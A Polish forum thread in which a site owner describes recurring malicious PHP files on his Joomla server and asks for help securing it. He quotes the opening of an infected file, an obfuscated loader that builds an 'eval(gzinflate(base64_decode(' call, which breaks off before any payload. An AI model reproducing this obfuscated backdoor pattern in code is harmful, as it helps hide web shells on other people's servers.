[PHP]Problem z wirusem lub Joomla Opcje

[damianoo]

Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd.

Proszę o pomoc.

Część zawartości jednego z plików, w tym wypadku wp-error.php

[PHP] pobierz, plaintext 
<?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 =
[PHP] pobierz, plaintext 

[damianoo]

Nie mam nigdzie 777. Wgrywają się jakieś pliki php samoistnie, pomimo zmiany hasła do ftp;/ nie wiem co już mam robić;/

Czy jest jakiś programista który pomoże uporać mi się z problemem? oczywiście zapłacę.

Sprawa wygląda następująco,
Zmieniłem skrypt na Joomla 3.4, nie został ani jeden plik ze starego skryptu. przed wgraniem serwer wyczyściłem, zmieniłem hasła i dziś znów dokonano ataku. W pliku config.php był jakiś dziwny dopisek...